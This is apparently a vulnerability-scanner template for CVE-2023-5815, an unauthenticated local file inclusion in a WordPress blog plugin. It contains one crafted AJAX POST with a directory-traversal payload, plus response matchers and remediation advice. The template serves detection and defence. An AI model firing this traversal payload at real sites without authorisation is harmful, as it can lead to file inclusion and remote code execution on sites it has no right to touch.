id: CVE-2023-5815

info:
  name: News & Blog Designer Pack – WordPress Blog Plugin <= 3.4.1 - Unauthenticated Local File Inclusion
  author: daffainfo
  severity: high
  description: |
    The News & Blog Designer Pack WordPress plugin up to version 3.4.1 is vulnerable to remote code execution caused by local file inclusion in the bdp_get_more_post function, letting unauthenticated attackers include arbitrary PHP files. Exploitation requires an AJAX request with crafted POST data.
  impact: |
    Attackers can include arbitrary PHP files, leading to remote code execution and full site compromise.
  remediation: |
    Update to the latest version beyond 3.4.1 or disable the vulnerable AJAX functionality.
  reference:
    - https://wordpress.org/plugins/blog-designer-pack/
    - https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2bdf11-401a-48af-b1dc-aeeb40b9a384?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-5815
    epss-score: 0.49165
    epss-percentile: 0.97833
    cpe: cpe:2.3:a:infornweb:news_\&_blog_designer_pack:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: infornweb
    product: news_\&_blog_designer_pack
    framework: wordpress
    publicwww-query: "/wp-content/plugins/blog-designer-pack/"
  tags: cve,cve2023,wordpress,wp,wp-plugin,blog-designer-pack,lfi,vkev

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=bdp_get_more_post&shrt_param[design]=../../../../../wp-login

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success"'
          - '"data"'
          - 'wp-login'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203a63a9f481d2d19234f89d03292a66fb128dfd5940029bcc5cc29191188a11c9022100e1e9da5d5c2e58a86fa6b62dcba18568bc2b432cf068bee9a26a472affcb832d:922c64590222798bb761d5b6d8e72950